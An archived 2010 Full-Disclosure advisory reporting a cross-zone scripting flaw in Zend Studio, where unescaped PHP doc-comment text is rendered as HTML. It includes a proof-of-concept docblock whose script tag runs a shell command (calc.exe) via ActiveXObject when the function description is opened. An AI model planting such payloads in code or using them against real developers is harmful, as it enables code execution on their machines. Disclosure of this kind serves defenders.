lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 10 Jul 2010 13:44:00 +0800
From: IEhrepus <5up3rh3i@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Zend studio location Cross-Domain Scripting
	Vulnerability

Author: www.80vul.com [Email: saiy1986@...il.com]
Release Date: 2010/7/10
References:
http://80vul.com/Zend%20studio/Zend%20studio%20location%20Cross.htm

Zend Studio is a commercial, proprietary integrated development environment
(IDE) for PHP developed by Zend Technologies, based on the PHP Development
Tools (PDT) plugin for the Eclipse platform (the PDT project is led by
Zend).
We found a security bug of it in Zend studio [version >6.0], the description
of a function of php script does'nt be escaped or htmlencode, so it lead to
can be exploited to execute arbitrary HTML and script code what the attacker
inject evil codz on function’s description.

And this vul is a “Cross-Zone Scripting” vul, so Successful exploitation
allows execution of arbitrary code in user’s system.

DEMO:

<?php

/**
* <script>new
ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
*/
function a() {
}

Then Open the function a()’s description [type a word "a" or move your mouse
on it] ,the calc.exe well be run.



Disclosure Timeline:

2009/07/08 - Found this Vulnerability
2009/07/10 - Public Disclosure


-- 
hitest

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ